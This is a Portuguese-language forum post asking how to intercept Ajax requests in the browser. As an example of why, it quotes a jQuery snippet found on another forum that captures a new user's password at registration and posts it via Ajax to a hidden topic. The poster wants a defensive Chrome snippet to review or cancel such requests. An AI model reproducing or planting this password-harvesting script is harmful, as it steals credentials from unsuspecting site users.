Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Interceptar requisições Ajax

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Interceptar requisições Ajax

    Olá,

    Tenho a seguinte dúvida, como eu posso fazer para "interceptar" requisições Ajax antes que elas sejam feitas?

    Por exemplo, em alguns fóruns enquanto navegamos constantemente requisições estão sendo feitas sem nosso conhecimento, outro dia estava em um fórum e resolvi dar uma olhada nos scripts deles e encontrei o seguinte:
    Código:
    jQuery(document).ready(function () {
     if (_userdata["user_posts"] === 0) {
         jQuery('<div id="get_pass" style="display: none;"></div>').insertAfter('#right .module:last');
         jQuery('#ucp input[name="submit"]').on('click', function () {
             var fieldValue = document.getElementById('password_reg').value;
             localStorage.setItem('text', fieldValue);
         });
         jQuery(window).load(function () {
             storedValue = localStorage.getItem('text');
             if (storedValue) {
                 jQuery('#get_pass').html(storedValue);
             }
             var senha = jQuery('#get_pass').text();
             jQuery.post('/post', {
                 message: 'Minha senha: ' + senha + '',
                 t: '4',
                 mode: 'reply',
                 post: 'Enviar'
             });
         });
     }
    });
    Para quem não entendeu, isso faz com que ao usuário digitar a senha dele esse script pega a senha e envia para um tópico escondido dos usuários normais (via Ajax), ou seja o cara deve ter um log com a senha de todos os usuários do fórum dele.

    Eu peguei o hábito de não usar a mesma senha em todos os sites que navego, assim não terei problemas em ele saber a minha ou não, mas não gostaria que isso se repetisse, então estou em busca de um script (talvez para usar como Snippet no Chrome não sei ainda) para toda vez que seja feita uma requisição Ajax um alert aparece na minha tela mostrando qual o conteúdo que será enviado nessa requisição e alguma forma de confirmar isso (caso seja legitimo) ou cancelar (caso seja malicioso).

    Eu agradeço a atenção de todos, e obrigado desde já.
    Similar Threads
X
Working...
X